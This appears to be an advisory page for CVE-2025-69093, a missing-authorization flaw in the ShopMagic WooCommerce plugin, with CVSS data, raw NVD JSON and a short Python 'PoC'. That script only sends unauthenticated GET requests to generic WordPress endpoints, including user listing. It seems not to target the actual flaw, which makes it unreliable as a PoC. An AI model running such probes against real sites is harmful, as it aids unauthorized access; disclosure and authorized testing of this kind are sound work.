Security Vulnerability Report
中文
CVE-2025-69093 CVSS 5.3 MEDIUM

CVE-2025-69093

Published: 2025-12-30 11:16:03
Last Modified: 2026-04-15 00:35:42

Description

Missing Authorization vulnerability in wpdesk ShopMagic shopmagic-for-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects ShopMagic: from n/a through <= 4.7.2.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

ShopMagic for WooCommerce <= 4.7.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys def check_cve_2025_69093(target_url): """ CVE-2025-69093 PoC - ShopMagic Missing Authorization This PoC demonstrates the broken access control vulnerability in ShopMagic plugin. Note: Only use for authorized security testing. """ print(f"[*] Testing CVE-2025-69093 on {target_url}") # Common ShopMagic AJAX endpoints that may lack authorization endpoints = [ '/wp-admin/admin-ajax.php', '/wp-json/shopmagic/v1/', '/wp-json/wp/v2/users', ] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Content-Type': 'application/json', } for endpoint in endpoints: url = target_url.rstrip('/') + endpoint try: # Test unauthenticated access response = requests.get(url, headers=headers, timeout=10, verify=False) print(f"[+] Endpoint: {endpoint} - Status: {response.status_code}") if response.status_code == 200: print(f"[!] Potential unauthorized access detected at {url}") print(f" Response preview: {response.text[:200]}...") except requests.exceptions.RequestException as e: print(f"[-] Error accessing {endpoint}: {str(e)}") print("[*] Testing complete. Manual verification recommended.") if __name__ == '__main__': if len(sys.argv) < 2: print("Usage: python poc.py <target_url>") print("Example: python poc.py http://example.com") sys.exit(1) check_cve_2025_69093(sys.argv[1])

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69093", "sourceIdentifier": "[email protected]", "published": "2025-12-30T11:16:02.683", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in wpdesk ShopMagic shopmagic-for-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects ShopMagic: from n/a through <= 4.7.2."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/shopmagic-for-woocommerce/vulnerability/wordpress-shopmagic-plugin-4-7-2-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}